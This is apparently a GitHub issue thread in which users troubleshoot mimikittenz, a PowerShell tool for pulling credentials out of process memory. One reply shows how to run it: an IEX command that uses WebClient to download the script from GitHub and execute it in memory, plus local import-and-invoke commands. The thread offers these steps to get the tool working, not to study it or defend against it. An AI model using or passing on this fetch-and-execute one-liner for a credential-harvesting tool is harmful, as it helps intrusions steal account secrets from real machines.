mimikittenz
mimikittenz copied to clipboard
NO WORK!!!...
HOW TO FIX?
gearcapitan i don't see any import-module Invoke-mimikittenz.ps1?
you already did it?
just do this PS> Import-Module .\Invoke-mimikittenz.ps1 PS> Invoke-mimikittenz
@gearcapitan
PS C:\Users\test> IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1")
PS C:\Users\test> Invoke-mimikittenz
or
PS C:\Users\test\Desktop> . .\Invoke-mimikittenz.ps1 # double dots
PS C:\Users\test\Desktop> Invoke-mimikittenz
nothing happens
that's another issue BTW this one is """fixed"""
just try to learn a little bit more of powershell.... and review your github link the first photo show that you don't get the RAW file from github.... and @nixawk do it right 👍